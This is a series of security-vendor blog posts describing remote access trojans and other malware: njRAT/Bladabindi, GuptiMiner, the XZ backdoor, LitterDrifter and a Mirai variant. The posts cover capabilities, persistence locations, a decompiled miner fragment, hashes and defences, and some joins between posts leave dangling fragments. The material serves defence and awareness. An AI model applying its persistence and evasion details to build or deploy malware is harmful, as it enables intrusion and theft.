Unfortunately, cybersecurity teams often have difficulty detecting RATs. This is because malware typically carries many concealing features, allowing it to avoid any detection. In addition, RATs manage resource utilization levels so that there is no performance degradation, making it difficult to detect the threat.

Ways of using Remote Access Trojan

The following are ways in which a RAT attack can compromise individual users, organizations, or even entire populations:

• Spying and blackmail: An attacker who has deployed a RAT on a user’s device gains access to the user’s cameras and microphones. Consequently, he can take pictures of the user and his surroundings and then use this to launch more sophisticated attacks or blackmail.
• Launch Distributed Denial of Service (DDoS) Attacks: Attackers install RATs on many user devices, then use those devices to flood the target server with spoofed traffic. Even though the attack can cause network performance degradation, users are often unaware that hackers use their devices for DDoS attacks.
• Cryptomining: In some cases, attackers can use RATs to mine cryptocurrency on the victim’s computer. By scaling this action to many devices, they can make huge profits.

Remote file storage: Sometimes attackers can use RATs to store illegal content on unsuspecting victims’ machines. That way, authorities can’t shut down the attacker’s account or storage server because he keeps information on devices belonging to legitimate users.

• Industrial Systems Compromise: As described above, attackers can use RATs to gain control over large industrial systems. These could be utilities such as electricity and water supplies. As a result, an attacker can cause significant damage to the industrial equipment by sabotaging these systems and disrupting critical services in entire areas.

Remote Access Trojan Examples

njRAT

NjRAT is probably the most known and the oldest among remote-access trojans. Appeared in 2012, it keeps getting updates, which adjust its functionality to the modern “standards”, which makes up for its longevity. The reason for this is probably the attention from state-sponsored threat actors – APT36 and APT41 – who use it in cyberattacks almost since its very inception.

Key functionality of njRAT is typical for pretty much any remote-access trojan – it is about providing remote access. The latter is topped up with uploading and downloading files by command, log keystrokes and capture microphone and camera inputs. Some of its variants are also capable of grabbing credentials from browsers and cryptocurrency apps.

One interesting feature of this remote access trojan is its naming. Threat analysts use its original name interchangeably with Bladabindi. The latter is a detection name that Microsoft assigned to this trojan back in its early days. Usually, Redmond changes the naming as the malware gains volume and power, but this did not happen here.

Sakula

Sakula is seemingly harmless software with a legitimate digital signature. However, the malware first appeared in 2012 and is used against high-level targets. It allows attackers to take full advantage of remote administration on the device and uses simple unencrypted HTTP requests to communicate with the C&C server. Additionally, it uses a Mimikatz password stealer to authenticate using a hash transfer method that reuses operating system authentication hashes to hijack existing sessions.

KjW0rm

KjW0rm is a worm written in VBS in 2014 that uses obfuscation, making it difficult to detect on Windows computers. It has many variations; the older parent version is called “Njw0rm”. The malware and all other variants belong to the same family, with many features and similarities in its workflow. It deploys stealthily and then opens a backdoor that allows attackers to gain complete control of the machine and send data back to the C&C server.

Havex

Havex is a Remote Access Trojan discovered in 2013 as part of a large-scale spying campaign targeting production control systems (ICS) used in many industries. Its author is a hacker group known as Dragonfly and Energetic Bear. It gives attackers complete control over industrial equipment. Havex uses several mutations to avoid detection and has a minimal footprint on the victim’s device. It communicates with the C&C server via HTTP and HTTPS protocols.

Agent.BTZ/ComRat

Agent.BTZ/ComRat (also called Uroburos) is a Remote Access Trojan that became infamous after hackers used it to break into the U.S. military in 2008. The first version of this malware was probably released in 2007 and had worm-like properties, spreading via removable media. From 2007 to 2012, developers released two significant versions of RAT. Most likely, this is a development of the Russian government. It can be deployed via phishing attacks and uses encryption, anti-analysis, and forensic techniques to avoid detection. In addition, it provides complete administrative control over the infected machine and can transmit data back to its C&C server.

Dark Comet

Backdoor.DarkComet is a Remote Access Trojan application that runs in the background and stealthily collects information about the system, connected users, and network activity. This Remote Access Trojan was first identified in 2011 and is still actively used today. It provides complete administrative control over infected devices. For example, it can disable task manager, firewall, or user access control (UAC) on Windows machines. In addition, Dark Comet uses encryption, thereby avoiding detection by antivirus.

AlienSpy

AlienSpy is a RAT that supports multiple platforms. This allows payload creation for Windows, Linux, Mac OS X, and Android operating systems. It can collect information about the target system, activate the webcam, and securely connect to the C&C server, providing complete control over the device. In addition, AlienSpy uses anti-analysis techniques to detect the presence of virtual machines. According to the researcher who analyzed the threat, the operator behind the author of the service is a native Spanish speaker, probably Mexican.

Heseber BOT

The Heseber BOT is based on the traditional VNC remote access tool. It uses VNC to remotely control the target device and transfer data to the C&C server. However, it does not provide administrative access to the machine unless the user has such permissions. Since VNC is a legitimate tool, Haseber antivirus tools do not identify it as a threat.

Sub7

Sub7 is a Remote Access Trojan that runs on a client-server model. The backdoor was first discovered in May 1999 and ran on Windows 9x and the Windows NT family of operating systems up to Windows 8.1. The server is a component deployed on the victim machine, and the client is the attacker’s GUI to control the remote system. The server tries to install itself into a Windows directory and, once deployed, provides webcam capture, port redirection, chat, and an easy-to-use registry editor.

Back Orifice

Back Orifice is a Remote Access Trojan for Windows introduced in 1998. It supports most versions beginning with Windows 95 and is deployed as a server on the target device. It takes up little space, has a GUI client, and allows an attacker to gain complete control over the system. RAT can also use image processing techniques to control multiple computers simultaneously. The server communicates with its client via TCP or UDP, usually using port 31337.

How To Protect Against Remote Access Trojan?

As stated above, Remote Access Trojans rely on their stealthiness. Once it has appeared, you will likely struggle to detect it, even if the exact malware sample is not new. That’s why the best way to protect against Remote Access Trojan is to not even give it a chance to run. The following methods represent proactive actions that severely decrease the chance of malware introduction and the possibility of getting in trouble.

Security training

Unfortunately, the weakest link in any defense is the human element, which is the root cause of most security incidents, and RATs are no exception. Therefore, it’s strategy for defending against RATs depends on organization-wide security training. In addition, victims usually launch this malware through infected attachments and links in phishing campaigns. Therefore, employees must be vigilant not to contaminate the company network and jeopardize the entire organization accidentally.

Using multi-factor authentication (MFA)

Since RATs typically try to steal passwords and usernames for online accounts, using MFA can minimize the consequences if a person’s credentials are compromised. The main advantage of MFA is that it provides additional layers of security and reduces the likelihood that a consumer’s identity will be compromised. For example, suppose one factor, such as the user’s password, is stolen or compromised. In that case, the other factors provide an additional layer of security.

Strict access control procedures

Attackers can use RATs to compromise administrator credentials and gain access to valuable data on the organization’s network. However, with strict access controls, you can limit the consequences of compromised credentials. More stringent rules include:

• More strict firewall settings
• Safelisting IP addresses for authorized users
• Using more advanced antivirus solutions

Solutions for secure remote access

Every new endpoint connected to your network is a potential RAT compromise opportunity for attackers. Therefore, to minimize the attack surface, it’s important to only allow remote access through secure connections established through VPNs or security gateways. You can also use a clientless solution for remote access. It does not require additional plug-ins or software on end-user devices, as these devices are also targets for attackers.

Zero-trust security technologies

Recently, zero-trust security models have grown in popularity because they adhere to the “never trust, always verify” principle. Consequently, the zero-trust security approach offers precise control over lateral movements instead of full network access. It is critical to suppressing RAT attacks, as attackers use lateral moves to infect other systems and access sensitive data.

Focus on infection vectors

Like other malware, Remote Access Trojan is a threat only if installed and implemented on the target computer. Using secure browsing, anti-phishing solutions, and constantly patching systems can minimize the likelihood of RAT. Overall, these actions are a good tone for improving security for any case, not only against Remote Access Trojans.

Pay attention to abnormal behavior

RATs are Trojans that may present themselves as legitimate applications but contain malicious features associated with the actual application. Tracking the application and system for abnormal behavior can help identify signs that might indicate a Remote Access Trojan.

Monitoring network traffic

An attacker uses RATs to remotely control an infected computer over the network. Consequently, a RAT deployed on a local device communicates with a remote C&C server. Therefore, you should pay attention to unusual network traffic associated with such messages. In addition, it would be best to use tools such as web application firewalls to monitor and block C&C messages.

Implement least privilege

The concept of least privilege implies that applications, users, systems, etc., should be restricted to the permissions and access they need to do their jobs. Therefore, using the least privilege can help limit an attacker’s actions with RAT.

Are Remote Access Trojans illegal?

Well, yes, but actually, no. It all depends on how and what you use it for. It is not the program itself that makes such tasks illegal. It’s the implementation. You can test and execute if you’ve written a Remote Access Trojan and have a home lab. You can use it if you have written permission from the other party. However, if you use the RAT maliciously, you may face some legal problems. So, to distinguish, professionals use the term “remote access tools” for legitimate access and control and “remote access trojan” for illegitimate access and control.

The post Remote Access Trojan (RAT) appeared first on Gridinsoft Blog.

Campaign discovery and GuptiMiner

Avast specialists analyzed the activity of the GuptiMiner malware active since 2018. GuptiMiner is a sophisticated malware that aims at spreading backdoors and performing hidden cryptomining in corporate networks. The malware utilizes a multi-stage infection chain. It starts by hijacking antivirus software updates through man-in-the-middle (MitM) attacks. This allows attackers to substitute legitimate updates for malicious ones.

Avast informed eScan and India CERT of the found vulnerability, which was successfully patched on July 31, 2023. However, since users rarely install more than one antivirus, this limits the ability to detect and analyze the full scope of GuptiMiner’s activities.

This malware uses a complex infection chain. The attack starts by intercepting eScan antivirus updates. The update program is downloaded from the server, but in its path is an attacker who substitutes it with a malicious one. Next, eScan decompresses and downloads the package, initiating a chain of infection using a DLL. This DLL allows the virus to control further downloads and code execution.

Next, GuptiMiner uses a sideloading technique to inject malicious code into trusted processes, which allows the program to remain invisible to antivirus systems. The malware also communicates with remote command and control (C2) servers to receive commands and updates. This allows attackers to control infected systems, run additional malicious processes, or conduct cryptocurrency mining.

How does GuptiMiner work?

GuptiMiner analysis revealed that the malware used a variety of sophisticated techniques to install and hide its presence on the system. Key techniques included sideloading DLL, modifying system files, and using forged digital signatures to simulate legitimacy.

Also, one of the characteristic features of GuptiMiner is its ability to modularize infections. This includes performing DNS queries to the attacker’s DNS servers and extracting useful data from innocent-looking images. In addition to its core functionality of installing backdoors, GuptiMiner unexpectedly spreads the XMRig miner used to mine the Monero cryptocurrency.

The process of dynamically assigning mining threads for XMRig:
xmrig_shellcode_copy_ = xmrig_shellcode_copy;
num_cores_ = num_cores;
dword_140020908 = 25;
xmrig_shellcode_copy-›max_cpu_usage = '53';
xmrig_shellcode_copy_->threads = '1';
if (num_cores_ >= 6)
xmrig_shellcode_copy_-›threads = '2';
if ( num_cores_ >= 8 )
xmrig_shellcode_copy_->threads = '3';

The malware has been identified as potentially linked to the Kimsuky, a prominent North Korean hacking group. This indicates possible state sponsorship and a high degree of organization of the attacks. Before, North Korean hackers showed a certain degree of interest in acquiring cryptocurrency. So, this should not be too much of a surprise.

Two Different types of Backdoors

While analyzing the GuptiMiner malware, researchers identified two different types of backdoors. Both types of backdoors were designed to function as part of a large-scale and well-planned campaign. But each was designed to perform specific tasks on infected corporate networks.

• The first type of backdoor is a modified version of PuTTY Link, which is used to scan SMBs on the local network. This backdoor allows lateral movement (horizontal propagation of malware within the network) to access potentially vulnerable systems running Windows 7 and Windows Server 2008. This facilitates the exploitation of vulnerabilities in legacy operating systems.
• The second type of backdoor is multifunctional and modular. It accepts commands from the attacker to install additional modules and specializes in finding and stealing locally stored private keys and cryptocurrency wallets. This approach allows attackers to monitor infected systems for long periods of time and activate additional malicious features if necessary.

The post GuptiMiner Use eScan to Spread Miners and Backdoors appeared first on Gridinsoft Blog.

Backdoor in XZ Compromised Numerous Linux Systems

The story around the backdoor in XZ data compression tool is nothing short of marvelous, from both ends, and may probably be screened in future. A guy under the nickname Jia Tan was making his way to the status of project administrator since 2021. Typically for any tech savvy open-source project user, he started offering his fixes for bugs and new functions. Allegedly by creating a huge number of bug reports, the guy forced the manager to seek for an aide, with Jia being the best candidate at that moment.

This long road was needed to hide a tiny, deeply concealed backdoor (CVE-2024-3094) that is not even available from the public GitHub repository. The catch actually hides within the version that goes to the dependent project, mainly major Linux distributions. Files responsible for the backdoor initiation appear as test ones. This explains why it took so long: to avoid detection, Jia Tan was forced into adding each piece gradually, making it look like a development routine. A proper special operation, one may say.

The resulting flaw allowed for the unauthenticated SSH access to any machine. The only condition here is the infected XZ package and SSH usage. This, in turn, endangers thousands of servers that system administrators quite commonly connect through this protocol. Linux is a backbone of cloud servers, and having such a backdoor access effectively means leaking all the data they store.

More of the special operation things surfaced during the ongoing investigation. Shortly after Jia pushed the malicious fixes, numerous XZ update requests popped up in feedback hubs of different Linux distributions. Investigators suppose that either Jia Tan or his associates posted these comments. Some of the distros adhered to them and pulled the infected version, effectively installing the malware into their product.

How Was It Discovered?

The way the backdoor was discovered, on the other hand, sounds more like a miracle. Andres Freund, the developer, noticed that the SSH authentication takes 500ms longer than usual. Also, the operation started taking more CPU power than it used to, which intrigued Anders to search for a new bug. Searches quickly led him to the updated XZ version, and consequently to the backdoor built into it.

Andres Freund released his notification regarding the malicious changes on March 29, 2024. It is still unclear how long these changes were live, but Linux distributions were using them in release versions since early March. Among them are the following distros and versions:

Mitigations and Fixes

Upon discovering the backdoor code, the project maintainers instantly took down the GitHub repository. Though, further research showed that there was no need for this. As I’ve mentioned, malicious code was hidden in test files, mainly used in dependent projects like distributions. This, however, did not make the task any easier.

Together with the developers and maintainers of affected distros, Andres Freund elaborated both the list of affected versions and possible mitigations. Users should downgrade to the versions that do not contain malicious code, or upgrade to ones where it is already gone. At the same time, the investigation keeps going, as this supply chain attack can have more severe effects.

The post XZ Utils Backdoor Discovered, Threating Linux Servers appeared first on Gridinsoft Blog.

What is Backdoor:Win32/Bladabindi!ml?

Backdoor:Win32/Bladabindi!ml is the Windows Defender detection for njRAT malware, that is categorized as backdoor. “Bladabindi” is one of many names used by antivirus companies to categorize and identify various malware, including njRAT.

NjRAT is a trojan and can be installed on a computer without the user’s knowledge. It acts as a backdoor, giving attackers remote access and control over the infected system. Once installed, njRAT can perform various activities including collecting sensitive information, recording keystrokes, stealing passwords, intercepting traffic, and even controlling the computer’s webcam and microphone.

Bladabindi!ml can be spread in a variety of ways. This includes email attachments or malicious links, downloads via malicious websites, exploitation of software vulnerabilities, or social engineering. It can also self-propagate by infecting USB drives connected to an infected computer. Cybercriminals can use various methods to trick users into installing njRAT on their computers.

Bladabindi Backdoor Threat Analysis

NjRAT features several versions, detected in different attacks. Nonetheless, they are not much different in terms of their capabilities and effects. Let’s have a look at what dangers a typical Bladabindi sample carries for the system.

Launch and Detection Evasion

Bladabindi employs various techniques to evade detection upon launch. It comes with its own builder, and before attacking, it allows hackers to pre-configure the payload to their needs before it is delivered to the victim’s computer. This includes the name of the executable file, startup key creation in the registry, directory placement within the target system, host IP address, and network port, among others.

Such customization enables njRAT to circumvent many static checks called to avoid antivirus detection. Additionally, the malware utilizes multiple .NET obfuscators, making its code challenging to analyze for both humans and automated systems. These features make njRAT a tough nut to both analyze and detect and obviously stand for its success.

Establishing Persistence

After the initial system checks, the Bladabindi backdoor ensures its persistence within the infected system by creating a startup instance, typically in the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp” directory. It also manipulates the Windows registry by creating a key with a unique name and a random set of characters and digits under the “HKEY_CURRENT_USER\Software\32” hive. These actions ensure that the malware executes each time the system boots up. They maintain a foothold within the infected machine even after reboots.

Data Collection & Other Functionality

After finalizing the preparations, njRAT a.k.a Bladabindi performs some basic callouts to the command server. Depending on the response, malware can switch to the idle, start collecting user data or pull the additional payload from the remote server. The overall list of actions it can perform is the following:

• Executing remote shell commands
• Downloading and uploading files
• Capturing screenshots
• Logging keystrokes
• Camera and microphone access
• Stealing credentials from web browsers and desktop crypto applications

Is Win32/Bladabindi!ml false positive?

Some programs may have features or behaviors that may be mistakenly considered suspicious by antivirus software. As a result, Windows Defender shows a false positive detection. This may be due to the use of certain APIs, network requests, or data encryption that may be characteristic of malware but are also present in legitimate applications.

It’s also worth noting that antivirus often adds “!ml” to the end of its name – to indicate the use of the AI detection system. Although it is a highly effective method, without the confirmation from other detection systems, it is easy to make it generate false positive detections.

How to Remove Backdoor:Win32/Bladabindi!ml Virus?

The most reliable way to remove Backdoor:Win32/Bladabindi!ml is to use a reliable antivirus program with updated virus databases. I recommend an antivirus like GridinSoft Anti-Malware, it is best to detect and remove even the sophisticated malware like Bladabindi/njRAT.

After removing Win32/Bladabindi!ml, it is recommended to perform additional system scans to make sure that all threats have been successfully removed. And in the future, be vigilant when surfing the Internet and downloading files. Avoid visiting suspicious websites and opening attachments from unreliable sources.

The post Backdoor:Win32/Bladabindi!ml Analysis & Removal Guide appeared first on Gridinsoft Blog.

Who are Gamaredon?

Gamaredon’s unique profile goes beyond its commitment to espionage goals. The Security Service of Ukraine (SSU) has linked Gamaredon personnel to the Russian Federal Security Service (FSB), adding a geopolitical twist to the group’s activities. The FSB, responsible for counterintelligence, antiterrorism, and military surveillance, sheds light on the strategic and state-sponsored nature of Gamaredon’s operations. Despite the ever-changing landscape of its targets, Gamaredon’s infrastructure exhibits consistent patterns, emphasizing the need for careful scrutiny from cybersecurity experts.

What is LitterDrifter?

One of Gamaredon’s tools – the notorious USB-propagating worm, LitterDrifter. This VBS-written malware showcases Gamaredon’s adaptability and innovation. Despite the old name of malware type, it packs quite a lot of functions much needed in modern cyberattacks.

As a part of the APT’s infrastructure, LitterDrifter introduces a global element to Gamaredon’s operations. Beyond its intended targets in Ukraine, this worm has left potential infections in its wake in countries like the USA, Vietnam, Chile, Poland, Germany, and even Hong Kong. The global reach of LitterDrifter adds to the overall potential of the threat actor in globe-scale cyberattacks.

The key functionality of LitterDrifter worm circulates around being the remote access tool. In other words, it is a backdoor with worm-like self-spreading capabilities. It is a hidden unauthorized access point in a computer system, software, or network that allows accessing the target environment. In cyberattacks, backdoors mostly act as initial access and reconnaissance tools, which then “open the gates” for further malware injection.

LitterDrifter doesn’t just spread automatically over USB drives. It introduces a global element to Gamaredon’s operations. Beyond its intended targets in Ukraine, this worm has left potential infections in its wake in countries like the USA, Vietnam, Chile, Poland, Germany, and even Hong Kong. The global reach of LitterDrifter highlights the broader threat it poses to cybersecurity worldwide.

Gamaredon’s Campaign Against Ukraine

Gamaredon Group has exhibited a sustained and targeted cyber espionage campaign against Ukraine and its institutions. It includes military, non-governmental organizations (NGOs), judiciary, law enforcement, and nonprofit entities since at least 2013. The group, suspected to have ties to Russian cyber espionage efforts, has consistently focused on infiltrating Ukrainian entities. It is evident in its choice of Ukrainian language lures and primary targets within the region.

LitterDrifter emerges as yet another tool employed by the group in its multifaceted cyber operations. As revealed through ongoing monitoring and analysis researchers, Gamaredon has utilized LitterDrifter alongside various other techniques and malware to achieve its objectives. This has further strengthened the group’s status as a advanced persistent threat against Ukrainian and allied interests.

Protection against LitterDrifter

As LitterDrifter reveals its global impact, it prompts a call for a unified and fortified global cybersecurity defense. The worm’s ability to transcend borders underscores the importance of international collaboration in addressing and mitigating cyber threats.

Protecting from threats like LitterDrifter requires a combination of proactive cybersecurity practices and vigilance. Here are some recommendations to enhance your protection against such worms:

• Be cautious when inserting USB drives into your computer, especially if they are from unknown or untrusted sources. Consider using USB drives that have read-only switches to prevent unauthorized writing.
• Regularly back up your important data and store backups in a secure location. In the event of a ransomware attack, having recent backups can help you restore your system without paying the ransom.
• Follow security best practices such as using strong, unique passwords, enabling two-factor authentication, and limiting user privileges. These practices can add layers of protection against various cyber threats.
• Keep yourself informed about the latest cybersecurity threats and vulnerabilities. Being aware of the evolving threat landscape enables you to adapt your security measures accordingly.

The post LitterDrifter – Russia’s USB Worm Targeting Ukrainian Entities appeared first on Gridinsoft Blog.

The campaign targets low-cost Android TV boxes such as Tanix TX6, MX10 Pro 6K, and H96 MAX X3. These devices have quad-core processors that can launch powerful DDoS attacks, even in small swarm sizes.

Mirai Botnet Aims Android-based TV Boxes

Mirai Botnet can infect devices via malicious firmware updates signed with publicly available test keys or malicious apps. Which undoubtedly distributed on domains that target users interested in pirated content. In the first case, firmware updates are either installed by resellers of the devices or users are tricked into downloading them from websites. Then, they promise unrestricted media streaming or better application compatibility.

The ‘boot.img‘ file contains the kernel and ramdisk components loaded during Android boot-up. It makes it an excellent persistence mechanism for the malicious service.

The second distribution channel involves the use of pirated content apps. They also offer access to collections of copyrighted TV shows and movies for free or at a low cost. Security experts have identified Android apps that spread the new Mirai malware variant to infected devices. Here is an example:

In this case, the malicious apps surreptitiously start the ‘GoMediaService‘ during the initial launch and set it to auto-start when the device boots up.

When the ‘gomediad.so‘ service is called, it unpacks multiple files, including a command-line interpreter that runs with elevated privileges (‘Tool.AppProcessShell.1‘) and an installer for the Pandora backdoor (‘.tmp.sh‘).

After being activated, the backdoor establishes communication with the C2 server, and replaces the HOSTS file. After that, it updates itself and then enters standby mode, waiting for instructions from its operators. The malware can launch DDoS attacks using the TCP and UDP protocols, such as generating SYN, ICMP, and DNS flood requests. It can also open a reverse shell, mount system partitions for modification, and perform other functionalities.

IoC Mirai Botnet

• Malware.U.Mirai.tr: 96b087abf05bb6c2c1dd6a1c9da460d57564cc66473ca011f85971752a112ce1
• Malware.U.Mirai.bot: 624f4966636968f487627b6c0f047e25b870c69040d3fb7c5fb4b79771931830
• Malware.U.Mirai.bot: 613f03b52910acb8e25491ca0bfe7d27065221c180e25d16e7457e4647a73291
• Malware.U.Mirai.bot: 22f269a866c96f1eec488b0b3aebe9f8024ae455255a4062e6a5e031dfd16533

What devices are at risk?

Budget-friendly Android TV boxes often have an uncertain journey from manufacturer to consumer. It leaves the end-user unaware of their origins, potential firmware modifications, and the various hands they’ve been through.

Even cautious consumers who retain the original ROM and are selective about app installations face a lingering risk of preloaded malware on their devices. It is advisable to opt for streaming devices from trusted brands like Google Chromecast, Apple TV, NVIDIA Shield, Amazon Fire TV, and Roku Stick.

Safety recommendations

For Android TV users, installing apps only from the official app store is advisable. It is also essential to pay attention to the permissions requested by the app. If your app requests access to your phonebook and geo-location, it is best to avoid using it as it could be malware. Additionally, it is crucial not to download or install any hacked apps, as their contents are often infected with malware of some kind.

The post Mirai variant “Pandora” infects Android TV for DDoS attacks. appeared first on Gridinsoft Blog.